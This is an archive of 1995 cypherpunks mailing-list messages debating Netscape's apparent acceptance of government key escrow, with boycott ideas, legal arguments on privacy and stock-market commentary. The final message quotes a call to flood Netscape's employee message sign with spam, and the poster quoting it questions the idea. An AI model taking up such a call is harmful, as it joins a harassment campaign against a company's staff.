http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Sat, 2 Dec 1995 22:34:03 +0800
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C006E4.D39@netscape.com>
Message-ID: <30C016E6.6264@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn wrote:
> 
> On Fri, 1 Dec 1995, Jeff Weinstein wrote:
> 
> > James A. Donald wrote:
> > >
> > > I will prepare the netscape dehanced dirty pictures web page,
> > > but not advertize the URL until shortly after December 5th.
> > >
> > > I hope to hear a suitable "clarification" before then.
> >
> >   See my recent message to this list.  We will be taking an anti-GAK
> > position.
> 
> So you will refuse to implement GAK in future version of netscape then?
> Or you will merely do lipservice to the GAK policies at the conference?
> 
> I think the distinction is quite key.

  If the law requires GAK, then I believe that we will implement it rather
than just disable encryption.  We are taking a position against GAK and
will continue to lobby against it.  We are planning to continue to do both
US and Export versions, so I don't think that the government's ploy of
trying to lure companies into weakening their domestic versions will work.
We released a 128-bit version of our product almost a year ago, at a
time when many companies were providing only weak crypto in their domestic
products so that they didn't have to trouble themselves with two versions.
We are actively lobbying in washington to get clarification of the
current regulations so that we can provide the US version via an "export
controlled" FTP or HTTP download.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sun, 3 Dec 1995 05:57:10 +0800
To: Herb Sutter <herbs@interlog.com>
Subject: Re: [NOISE] Barring access to Netscape
Message-ID: <v02130501ace58f7111d6@[165.254.158.210]>
MIME-Version: 1.0
Content-Type: text/plain


At 15:41 12/1/95, Herb Sutter wrote:

>At 14:26 12.01.1995 -0500, Robert A. Rosenberg wrote:
>>If you want to see one way of locking out Netscape users, check out this
>>URL which points at a Web Page that will not allow access by Netscape Users
>
>Just a personal note... while I am strongly in favour of security, this
>seems rather petulant and knee-jerkish.
>
>JeffW: Please add a configuration option to let users override the "Mozilla"
>ident, so that they can continue to use Netscape at all sites.  I personally
>won't use the override, though; if a site is going to insist on trying to
>frivolously exclude me as a user based on nothing but the browser I choose to
>use, they aren't serious anyway.
>
>>(the guy is ticked off at them trying to establish their own standards) -
>
>The _market_ establishes standards (been proven time and time again).  His
>reaction sounds pretty childish to me, but YMMV...
>
>Herb

I am not advocating his gripe (or the security question) - My message was
posted to provide an example of how to treat Netscape users special by
locking them out IF you have a need/desire to do so (which was what was
being requested).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 2 Dec 1995 23:23:48 +0800
To: cypherpunks@toad.com
Subject: Re: John Gage's comments at Computer Security Day in Cleveland
Message-ID: <199512021022.CAA21819@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Dr. Frederick B. Cohen wrote:

> John Gage gave an interesting pitch for Java at the CSSI Computer
> Security Day sessions in Cleveland yesterday (November 30).  Among
> his comments were:
> 
> 	Java is not secure - it is "safe"

No comment.

> 	He (John Gage) regularly downloads binary executables from the
> 	Internet and runs them on his workstation at Sun - (connected to
> 	the internal Sun network).

He downloads executables and runs them while connected to ...

Oops, ... no comment.

> 	Sun has terrible physical security - unknown people roam the halls
> 	at night all by themselves.

How do they get in the building in the first place??  Someone should 
think about a MEMBERS ONLY sign or something ...

Oops, ... no comment.

> 	In 2 years, you will be able to buy a computer that does more than
> 	a Sparc now does, in a portable package the size of a cell
> 	phone, with more than 30 million bits per second of mobile
> 	bandwidth direct to the Internet, for less than $30.

Now this last one could not pass without a deserved comment.

How will John have my fingers connect with the cell-phone sized keyboard?? 
I guess for LESS than $30, I probably shouldn't be moaning and
complaining, though ... especially if it's energy-star compliant.

> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236

Dr. Fred, as usual ... you're a hoot.  

Your timing is great.  And as luck would have it, I've got a Sun open
house to go to this Monday for their pre-Christmas shin-dig.  The
President of Sun Canada, (I think) is supposed to be in attendance. 

You just gave me some great material to goad him with.  Thanks.

Even though these social things aren't usually for shop-talk, I think I
might just save some of this stuff for use at the punch bowl. 

(Naah, I wouldn't do that.)-;  

But it is great material ... and perfect timing ... 



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:24:21 +0800
To: JR@ns.cnb.uam.es
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <951201140557.20a03b98@ROCK.CNB.UAM.ES>
Message-ID: <Pine.SUN.3.91.951202023919.18919A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

> From:	SMTP%"tcmay@got.net"  1-DEC-1995 12:26:55.99

> >First, a viable strategy is to simply do nothing. Ignore the government's
> >protestations, drag one's feet, shrug, etc. Jim Clark could simply have
> >said nothing. (Recall that Bill Gates came out recently saying that strong
> >encryption is inevitable...Clark could have either said nothing, or said
> >something similar to what Gates said.)
> 
> 	That may be a very bad move from their point of view. If the Gov.
> pushes hard, and it is an important customer, it is in their interest
> to satisfy them. As long as anyone else wants to follow the Gov. it is
> also good for them to follow those lines, and to be the first ones.
> 
> 	What about foreign customers? If the Gov. can restrict export of
> your technologies, they'll move to other providers. It is better for
> you to pay homage to the Gov. requests and get to overseas markets
> faster and sooner than anyone else.

You need to think real hard about how likely foreign customers on a scale 
as large as the U.S. government are going to be attracted to a product 
that forfeits its keys to the U.S. government.  Consider this problem 
again in light of all the hand waving about the U.S. intelligence 
agencies and industrial espionage/intelligence.

> 
> >Second, the issue is not "satisfying" a "bunch of cypherpunks." If Netscape
> >truly pushes for GAK, and people reject GAK and Netscape, then this will
> >surely hurt shareholder value. (Frankly, I expect one or more stories to
> >appear in the next few days about the budding "Friends Don't Let Friends
> >Use Netscape" and "Just Say No to Netscape" movements. Whether this will
> >hurt the stock is unclear.)
> 
> 	The "just say no" movement is OK as long as you don't append
> "to XXX". It could work if it is only Netscape... But as soon as anyone
> else gives in (e.g. Microsoft) it will become a burden. It's much better
> IMHO to ask "say yes to privacy". It's much better to say "this page is
> optimized for good safety and may not be reliable under non-crypto
> browsers -e.g. Netscape-" than saying "your browser is bad". Which
> BTW, may be OK in the USA, but is not in other places. Belgium comes
> to mind for forbidding negative advertising. And surely others. 

And most of those laws apply only to other members of the market, not 
"public safety" announcements by private or not-for-profit organizations.

It infuriates me to turn this into a question of hand wringing over 
exactly HOW to say that your keys will be turned over to the nearest 
government agency and that the product, from a security standpoint, is 
simply unacceptable.  I suppose we could call it "security challenged" 
but I think that a bit silly, don't you?

Then again, we wouldn't want to hurt anyone's feelings.

If you can't say anything nice, then key forfeiture obviously sucks.

> 
> >I say that the ideas being discussed are in fact "constructive" ideas.  I
> >won't reiterate them all here, but they clearly involve concrete action
> >(e.g., modifying server software to issue warnings to Netscape users, or
> >encouragement of alternatives to Netscape).
> 
> 	Some of them are. Others are not. Others are destructive (like
> denying access to Netscape users), or unpracticable (like saying "Mozilla
> is not the best thing" in some places), or unrealistic (like saying "quit
> your job"), or plain silly.

Let's put this example in a more personal context, with you as the 
netscape guru.  In fact, let us carry that assumption along, as really 
I'm talking to the netscape insiders to begin with.

It's silly or unrealistic only because your views on the subject are 
obviously worth less than the salary cut you would take for quitting.  
In fact, the fact that it is silly or unreasonable at all for you to 
resign is totally based on your assessment of what the spread of strong 
crypto and the opposition to key forfeiture is worth.  You have made that 
decision, but don't call hopeful prodding unrealistic unless you include 
the statement 'key forfeiture is simply not worth enough for me to endure 
the risk and likely salary cut I will have to face if I oppose it strongly.'

> 	If you deny access to a user, you'll make him/her angry. And not
> angry with Netscape. They'll be angry with you. We need people on our
> side. That's basic psychology. I'd go for more pages explaining what
> crypto is and can do for Joe Random.

Your faith in Joe Random vastly exceeds mine.

> 	Many people have said "I can do this or that with my server or
> whatever". How many people are offering an alternate safe crypto service 
> and making it interesting and desirable for Joe Random? And making it 
> well known? I'd say that not enough. 

And one less now that Netscape has taken this position, yes.  Shuffling 
the blame off on everyone else is a fine thing to do unless you are 
sitting on top of a hunk of cash, a lot of influence, and a foot into the 
market.  You have the chance here to do a lot of good, rather than cave 
in and suckle off the teat of your local authority figure.  Then again, 
your money is in your pocket, and we have well established exactly what 
strong crypto is worth to you.

> 	If you can offer an attractive service, protected with another
> crypto method, and make it popular, people will demand it. If you just
> add a note saying you use that crypto 'cos Government-enforced crypto is
> not good enough, people will feel happy and will learn.

Again, your faith in Joe Random is excessive.  NETSCAPE has a position of 
power at the moment, and could easily energize the issue and educate a 
lot more stockholders by taking a stand than by caving in.  If your 
concern is education, netscape press releases and political positions are 
much more potent in that regard than cypherpunks mailing lists.

Your information cost is lower by a factor of 100 or more.  Putting the 
burden on our shoulders, and then couching it in terms of the cypherpunks 
being negative, when indeed we are merely pointing out to whoever will 
listen that a spineless money decision has been made, is the center of 
hypocrisy.  It sickens me.

> 	In general, people prefer positive presentations to complaints
> or problems. Have a look at TV ads. How many of them say "Don't use
> that stuff, it's shit" instead of "Use my stuff, it's better".

As does this psycho-babble trash.

> 	That's what I advocate: a positive course of action, offering
> a better alternative. Not just a storm of complaints or "bad karma".

So when Pintos explode, I might as well just advertize Hondas as a 
'better value' and not mention the rather glaring fault in the competing 
product?

I might add, few cypherpunks (to their great credit) sell their 
software.  We are interested in the software being the strongest, and 
best quality.

Freeware has that effect, it clarifies the issue.  No longer is hype or 
advertizing an issue.  It is merely quality, and peer review, elements 
which Netscape has completely missed the target (and the barn) on from 
the beginning.

> >What more are you expecting? Have you been reading what people are actually
> >discussing doing and actually already doing?
> >
> 	Yes, I've read all along. As I hope will be more clear now. And
> I have found lots of people saying "I won't support Netscape", "I will
> say no", "I will deny access to Netscape", "I'll add a complaint to my
> page", "Jim should retract", "Netscape should go back", "Netscape better
> changes its money-making policy and becomes a political activist", 
> "This or that guy must quit job"...
> 
> 	What I was expecting is people to be more realistic, not to forget
> that the main goal of a company is to make money instead of defending public
> freedom (which indeed is bad for business), and start promoting better (or
> not) alternatives.

You mean to realize that Netscape could care less about the 'educated' 
consumer who is displeased with the decision, and instead is following 
that large nose which sniffs the wafting scent of green?

Look, I am as much for free market as anyone else.  That's fine.  Don't, 
however, tell anyone not to complain because this or that company is only 
in it for the money.  Some people vote with their feet.

I sold the lot of my netscape shares.  I did just fine, and I will sleep 
better at night.  SOME cypherpunks do buy stock.  Some of us put a great 
deal of money into the market in fact.  Some of us are interested in 
promoting companies that further our LONG term interests as well as short term 
interests.  If you would happen to look at the long term, you might 
discover that there is more money in it for Netscape, and everyone else, 
if strong crypto is not restricted.  Unfortunately, like most Joe 
Randoms, and most Joe Random Inc.'s, long term for you is when the 
restricted sell of your stock options expire.

Either support GAK or do not.  Don't give us horseshit about how you 
think we are being too hard on Netscape because we are educated 
consumers, and because we realize that GAK crypto is not the best product it 
could be.

It is as much our right to gripe and moan about the spineless decision as 
it is for you to make it.  To tell us to ignore it is hypocritical in the 
extreme.  If your product is so superior, why the hell should you care 
about a few cypherpunks moaning about this or that?  Aren't we members of 
the free market as well?  Who are you to tell us that our decision to 
promote or to denounce netscape is based on the wrong criteria?  The 
entire point of the free market is to hear and support those concerns in 
the proportionate levels and with the respective influences that they wield.

Take your emotional censorship elsewhere.  And while you're at it, try 
making a superior product to please us, rather than some high-school 
textbook psycho-babble about saying only nice things to the other 
children in the sandbox.

> 	And, to finish, note that I have also seen some very good answers,
> on which I don't comment since I agree and have little to add to.
>
> >--Tim May
> >
> 				jr


---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:48:32 +0800
To: Sten Drescher <dreschs@mpd.tandem.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com>
Message-ID: <Pine.SUN.3.91.951202031812.18919B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Sten Drescher wrote:

> Matt Miszewski <crypto@midex.com> said:
> 
> MM> On Thu, 30 Nov 1995, sameer wrote:
> 
> s> Jeff: If Netscape comes out in favor of GAK, will you leave?  (Wait
> s> until February, at least, of course..) You don't have to answer that
> s> to me, or the list, just think about it, and answer it for yourself.
> s> Do you think "anyone else" there would leave, as you say below that
> s> they don't want to go down history, etc...
> 
> MM> While this would go over well in the press if handled right please
> MM> let everyone remember that Jeff is a real person with bills to pay
> MM> and food to put on at least his own table.
> 
> 	I believe that was the point: How many people at Netscape would
> put principled opposition to GAK ahead of expediency?  My guess?  Not
> enough.
> 

And more importantly, what exactly is the GAK issue worth to netscape 
types?  Don't spout that trash about not being able to put food on the 
table.  Salary cut, maybe, temporary job search, maybe, but poverty?  I 
hardly think so.

So, for a 15% reduction in salary and 30 days of job search, is it worth it?

Answer for yourself.  That's where you really stand.


> -- 
> #include <disclaimer.h>				/* Sten Drescher */
> To get my PGP public key, send me email with your public key and
> 	Subject: PGP key exchange
> Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sat, 2 Dec 1995 16:48:15 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <Pine.BSF.3.91.951201171025.28141A-100000@mercury.thepoint.net>
Message-ID: <Pine.SUN.3.91.951202032514.18919C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Brian Davis wrote:

> On Fri, 1 Dec 1995, Jonathan Zamick wrote:
> 
> > Hmm. The key point is that almost no general users will have a clue what
> > actual security is, and what GAK is. They _might_ understand the risks of
> > having an explosive in their vehicle (but can just as easily argue it wasn't
> 
> > properly designed if it went off improperly.) Regardless of what they'd know
> > about their vehicle, they can easily claim to have had the risks associated with
> > GAK improperly represented, Netscape misleading them with deceptive claims
> > of security given this potential hole etc.
> 
> And thus we return to my original point, which is that it will depend on 
> what is said/disclosed.  If every copy of GAKscape had a banner, bigger 
> than the Netscape "N" which said, "The government can read every message 
> you send using this software no matter what you do" then I think 
> consumers will be hard pressed to say they weren't warned.

One might want to consider the effect of _Smith v. Maryland_, 442 U.S. 
735 (1979) - As described in _California v. Greenwood_, 486 U.S. 35 
(1988).  "We held in Smith v. Maryland, for example, that the police did 
not violate the Fourth Amendment by causing a pen register to be 
installed at the telephone company's offices to record the telephone 
numbers dialed by the suspect (without a warrant).  An individual has no 
legitimate expectation of privacy in the numbers dialed on his telephone, 
we reasoned, because he voluntarily conveys those numbers to the 
telephone company when he uses the telephone.  Again, we observed that 'a 
person has no legitimate expectation of privacy in information he 
voluntarily turns over to third parties.'"

or to rephrase in the likely implementation:

An individual has no legitimate expectation of privacy in the encryption 
numbers in his GAK browser, we reasoned, because he voluntarily conveyed 
those numbers to the government when he purchased the software.

> > 
> > I'm not saying whether or not this is the case, but we are very much in a
> > legal period where individuals are in fact expected not to need common sense,
> > and corporations are responsible for cleaning up after consumer stupidity.

I would say the above indicates that in fact a lot more than common sense 
is needed to try and assure privacy.  It would seem that when it comes to 
privacy, you have to be a phone techie or in this case, a crypto techie, 
to expect to be protected.

> > 
> > It is certainly true that given the general state of education regarding
> > crypto, the average consumer can easily say that regardless of warnings about
> > GAK, that they weren't properly informed of the risk. With all the hype
> > around security, Netscape and encryption people will be under the
> > impression regardless
> > of one little disclaimer tag, that their information is safe. Neither
> > government nor corporations will disabuse them of this belief. The case
> > would be strong against them as a consumer.

In fact it would seem that there is almost a burden imposed on the user 
to determine who and what gets the information of the software should he 
or she want to be protected by the constitution.

> I disagree.  Almost nobody reads the fine print on the back of a note you 
> sign when you buy a car or otherwise take out a loan, but the provisions 
> are generally enforceable ...  Ignorance is not necessarily an excuse.

Actually, I was under the impression that adherence contracts like that 
(the most oft touted example is the ski lift ticket with four paragraphs 
on the back) are often tossed out when it has to do with liability on 
that order.  The reason loan agreements are not often thrown out is 
because courts find an increased expectation that the consumer would be 
paying attention to the back of loan documents than the back of a ski 
lift ticket.  I think it will be unlikely that warnings on the box of a 
given piece of software will suffice.  Large banners in the program 
itself may meet the threshold.

If there is enough interest, I will research the threshold issue.

> > Jonathan
> > 
> > ------------------------------------------------------------------------
> > ..Jonathan Zamick                    Consensus Development Corporation..

> 
> Not a lawyer on the Net, although I play one in real life.
> **********************************************************
> Flame away! I get treated worse in person every day!!



---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 13:57:30 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C006E4.D39@netscape.com>
Message-ID: <Pine.SUN.3.91.951202034905.18919D-100000-100000-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 1 Dec 1995, Jeff Weinstein wrote:

> James A. Donald wrote:
> > 
> > I will prepare the netscape dehanced dirty pictures web page,
> > but not advertize the URL until shortly after December 5th.
> > 
> > I hope to hear a suitable "clarification" before then.
> 
>   See my recent message to this list.  We will be taking an anti-GAK
> position.

So you will refuse to implement GAK in future versions of netscape then?  
Or you will merely do lip service to the GAK policies at the conference?

I think the distinction is quite key.

Forgive the pun.

> 	--Jeff
 -- 
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sat, 2 Dec 1995 21:41:19 +0800
To: cypherpunks@toad.com
Subject: Re: Talking to Jim
Message-ID: <199512021324.FAA15861@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, PeterWiltshire wrote:

> Gidday all
> 
> I emailed Jim Clark day before yesterday about his comments re key escrow.

Uhhm, what is his email address??  

I'd love to ask him one or two questions, not just about key escrow, but
about Netscape's future prospects and its current stock valuation. 

(Netscape now has a market capitalization larger than Apple Computer.)

> He responded.  As it's not good form to post private email, might I suggest
> that one of the 'elders' here put to Jim a list of questions on the proviso
> that his answers can be posted to the list.  You never know, a lot of
> speculation might be confirmed or denied.

I've got some questions ...

Mathew Ingram reported in the Investment Reporter that Jim has stock
holdings currently worth more than $1 Billion in Netscape, and yet Jim was
quoted as saying at a recent technology conference "you could argue
there's something of an Internet bubble developing."  The article also
quoted him as saying that if Netscape made a profit in the next year or
two it would only be "because we miscalculated." 

Miscalculated??  I'll say.

If he thinks that GAK will go down with great support, when they want to
split their stock, then they're really not quite aware of the mind of the
organization that they'll be up against. 

I wonder what people will have to say about Netscape, then. 

Right now, brokerage firm Hambrecht & Quist is estimating that in five
years the Internet will be a $23 Billion market -- equal to the size of
the _entire_ software industry today.  And a money manager at Franklin
Resources Inc. said, "some people are suggesting the big tech company in
the next century could be Netscape." 

Personally, I don't think so.  But then who am I??

Goldman Sachs just put Netscape on its "recommended" list.  And some
analyst called Michael Parekh was quoted as saying that Netscape could hit
$200 in the next two years.  That it was going to be the Microsoft of the
Internet -- dominating the software side of the World Wide Web.

I wonder if Parekh's valuation is a pre or post stock split evaluation. 

Shoot, if Parekh is talking about $200 post-split ... then Netscape could
well become a really big league play in this game far sooner than most
people think.  I'd love to hear how this fits with Jim's words of a
"bubble". 

The market seems to "think" that it's a better present judge of what
Netscape has than he does.  It's almost as though the "market" has
developed a "mind" of its own.  Its own particular neural network.  It
doesn't seem like the market is paying attention to any of Jim's warnings
or words.  His "opinion" -- like all corporate officers' opinions are
strongly discounted and very lightly weighted. 

It's almost as though there is automated software at work. 

Some people might think about going short against the box on this one.  

Although the article talked about a short "squeeze" which would generally
mean that this stock is going to go nowhere but up as the short sellers
try to cover, personally, I might start to take some money off the table
and not add anything to my position.  But all this depends on the depth of
someone's pockets, I guess.  And on some serious trading analysis. 

Then again, there is that old adage about never fighting the tape.  It's 
compared frequently to whizzing into the wind, I think.  Probabilities 
and such.

(Disclaimer:  This is not intended as and should not be considered as
investment advice ... or for that matter as whizzing advice, either.)

I'd love to hear Jim talk some more about this. 

For me, all of this Netscape stuff is getting way too surreal.  It seems
really strange.  Some people are arguing that things are getting out of
hand, and yet it seems like this one is completely out of Jim's control. 

No one is listening to ANYTHING from Netscape at all.  The market is
simply listening to its own internal dialogue.  And that certainly is a
surprise to this writer.  It's a surprise to me, and it's probably a
surprise to Netscape.  Finance 501 is more complex than Finance 101. 

Maybe they should read up about the privatization of BP and the
involvement of the KIO.  Or learn a bit about Li Ka-Shing, or something
which adds to their knowledge base.  That might give some idea about what
is actually going on here. 

(Not that the Kuwaiti Investment Office or Li Ka-Shing has an interest in
this one.)



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 21:26:48 +0800
To: master@internexus.net (Laszlo Vecsey)
Subject: Re: Netscape, Mosaic, and other goodies.
In-Reply-To: <Pine.LNX.3.91.951201231649.5324C-100000@micro.internexus.net>
Message-ID: <9512021309.AA26669@all.net>
MIME-Version: 1.0
Content-Type: text


...
> It's funny how one day we are raving about how great Netscape is, and the 
> next day we hate them. If we aren't pleased with a particular piece of 
> software, instead of arguing about it we should just go and make one 
> that we are pleased with. Using the many libraries available such as MPEG, 
> GIF, JPEG for example and releasing it under the GNU agreement is the way 
> to go. Or perhaps we should just back the original browser, NCSA Mosaic. 
> With some improvements it could once again be the best browser on the net.

Isn't it strange that the same people on this list who have been giving
abuse to those of us who have been warning you about Netscape - are now
coming to see that we were right all along?

My point is NOT what you may think it is (i.e., that we were right and
you were wrong).  My point is that people on this list are a little bit
too quick to jump to conclusions.  Some of you are now marching off in
opposition to Netscape based on a rumor about what someone from Netscape
said and a report of a grant by the NSA.  This sort of knee jerk reaction
is often inappropriate.

As to the idea of going with NCSA's mosaic, I'm all for it.  In fact,
that's the browser I've been using all along - mostly because it comes
in source form so I can modify it for my less-popular operating
environment, because there's no fee for its use, and because it's not a
hyped up commercial venture with a stock having a price to earnings ratio
of 7,000.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sat, 2 Dec 1995 21:30:58 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com>
Message-ID: <9512021318.AA27932@all.net>
MIME-Version: 1.0
Content-Type: text


>   I had lunch with Jim Clark today, and explained the furor that was
> currently going on in cypherpunks and elsewhere.  After lunch he sent
> me the e-mail that I've attached below to pass along.  I think the gist
> of it is that if governments require key escrow, we will have to do it
> in order to sell our products with encryption into those countries.

The point Netscape seems to miss is that by refusing to go with weak
crypto and having the best product on the market, Netscape may be able
to force these governments into a position of accepting it.

Suppose Netscape took the position that it was 512 bit RSA, and that it
was for sale to anyone who wanted to buy it? The result would either be
a billion dollars of market impact and a collapse of the high-tech stock
bubble we are now building, or the government backing down.

If the US government backed down, and Netscape became the best product
around and maintained that lead for a long time, other countries would
either have to allow Netscape in, or suffer the consequences of falling
behind in the IT curve.

The right move for Netscape is to improve crypto-security, to refuse to
give in to government, and to publicly vilify the people in government
who stand in their way.  When billions of dollars are at stake and the
blame is placed squarely on the shoulders of a politician trying to
claim economic improvements based on their policies, the politician is
likely to yield.


-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Date: Sun, 3 Dec 1995 11:16:11 +0800
To: cypherpunks@toad.com
Subject: Talking to Jim
Message-ID: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Gidday all

I emailed Jim Clark day before yesterday about his comments re key escrow.
He responded.  As it's not good form to post private email, might I suggest
that one of the 'elders' here put to Jim a list of questions on the proviso
that his answers can be posted to the list.  You never know, a lot of
speculation might be confirmed or denied.

cheers

Peter 


                                             Flight to Quality
                                 Wiltshire Productions Pty Ltd
                              Brisbane, Queensland, Australia
               Intl Voice  61 7 3376 3535  Intl Fax  61 7 3279 4027
              Email wiltship@gil.com.au  PGP Key ID 3E584C7D
  PGP Fingerprint 01 03 FB F4 BE F8 2B F3 5D 84 6B 69 37 80 FE 10









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 3 Dec 1995 09:34:17 +0800
To: wiltship@iccu6.ipswich.gil.com.au (PeterWiltshire)
Subject: Re: Talking to Jim
In-Reply-To: <199512012310.KAA23844@iccu6.ipswich.gil.com.au>
Message-ID: <199512021417.JAA10944@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



PeterWiltshire writes:
> I emailed Jim Clark day before yesterday about his comments re key escrow.
> He responded.  As it's not good form to post private email, might I suggest
> that one of the 'elders' here put to Jim a list of questions on the proviso
> that his answers can be posted to the list.  You never know, a lot of
> speculation might be confirmed or denied.

Why doesn't he just post on his own? It's not like this mailing list is
unknown -- we got him bad press on the cover of the Times in the
past. Anyone is free to send email here.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 01:32:27 +0800
To: cypherpunks@toad.com
Subject: lance's netscape-gak page
Message-ID: <199512021718.JAA25725@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


Lance asked me to announce his page to the list, if he fell asleep.

Looks like he hasn't announced it, so here's the announcement.

Lance's netscape-GAK page is available from his homepage at
http://www.obscura.com/~loki/

	the graphic is nice. ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 2 Dec 1995 22:32:19 +0800
To: cypherpunks@toad.com
Subject: SHU_tup
Message-ID: <199512021424.JAA16245@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   12-2-95. NYPiper:

   "Accord Reached For Limiting Smut on Internet." Page One
   lead.

      Bowing to a seemingly unstoppable push in Congress to
      keep sexual material off the Internet, a coalition of
      commercial on-line services and some civil liberties
      groups agreed today to accept a number of restrictions
      they had opposed a few months ago.

   "Terrorism Bill Plan May Break Deadlock." Tiny article.

      In a bid to salvage a stalled antiterrorism bill, the
      chairman of the House Judiciary Committee has agreed to
      the demands of conservative Republicans to remove
      proposals expanding the Government's wiretapping
      authority.

   SHU_tup  (10 kb)







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 2 Dec 1995 22:46:27 +0800
To: cypherpunks@toad.com
Subject: Re: C'MON N' GIVE 'EM HELL, NET-NERDS!!!!
In-Reply-To: <m0tLhQS-00033cC@iquest.net>
Message-ID: <199512021438.JAA10983@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Okay, now that Linda Thompson seems to have trouble with Netscape, I
have to wonder if we are doing everything here right. I mean, she's a
nutcase, and although not everything nutcases say is insane, we have
to ask ourselves what is going on.

Perhaps we should wait a few days and ask Jim Clark for an official
position before doing anything to try to discourage the use of
Netscape browsers.

.pm

Linda Thompson, American Justice Federation writes:
> They asked for it:
> 
> "To secure Net communications, the government will need to
> have access to private data exchanges using what is known as a key escrow
> security system," -Netscape Communications chairman Jim Clark, arguing for
> a security system called key escrow that would require you to give the
> government access to your private messages.
> 
> Source: STAMPER'S NEWS NUGGETS 
> 
> (1)  SPAM THE SIGN
>  Netscape has a webpage at www.netscape.com.  There is a "toys" area and any
> message you leave in that area goes to an ELECTRONIC MARQUEE SIGN at
> Netscape that all the employees can see.  SPAM THAT SIGN.
> 
